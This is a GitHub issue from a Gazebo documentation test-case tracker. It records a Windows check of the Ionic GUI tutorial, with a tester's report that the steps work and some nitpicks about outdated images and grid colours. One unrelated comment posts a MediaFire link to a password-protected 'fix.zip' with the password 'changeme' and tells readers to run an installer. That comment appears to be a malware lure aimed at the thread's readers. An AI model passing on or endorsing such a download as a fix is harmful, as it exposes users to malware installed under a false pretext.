gazebosim/gazebo_test_cases #1057: docs: gui

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/docs/ionic/gui)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/GUI_tutorial.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knmcguire, 2024-09-10:
✅ works good! See resulting picture after the reset:

[image]

Nitbits:
* The first picture is not really correct in the tutorial since it doesn't contain the orange cone. 
* The first picture of https://gazebosim.org/docs/ionic/gui/#the-right-panel doesn't have the entered models that the user had to do in the first step (the added models). Then the reset instructions later don't really make sense.
* It seems that the grid color part of the grid plugin is broken as it only can do black or grayscale? It's not part of the tutorial but perhaps good to know

closed 2024-09-13 by azeey